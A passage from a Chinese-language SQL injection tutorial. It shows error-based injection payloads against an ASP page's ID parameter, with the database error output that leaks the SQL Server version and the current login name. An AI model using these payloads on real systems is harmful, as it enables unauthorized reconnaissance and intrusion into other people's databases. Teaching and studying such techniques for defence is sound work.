Application uses a value of the wrong type for the current operation.
三、搜集信息
确定可以实施注入攻击后,可以使用下面的方法对服务器进行测试。
测试SQL Server版本:
article_show.asp?ID=(SELECT @@VERSION)
Microsoft OLE DB Provider for ODBC Drivers 错误 ''''80040e07''''
[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 ''''Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) '''' 转换为数据类型为 int 的列时发生语法错误。
测试SQL Server当前的登录用户名:
article_show.asp?ID=(USER_NAME())
Microsoft OLE DB Provider for ODBC Drivers 错误 ''''80040e07''''
[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 ''''webuser'''' 转换为数据类型为 int 的列时发生语法错误。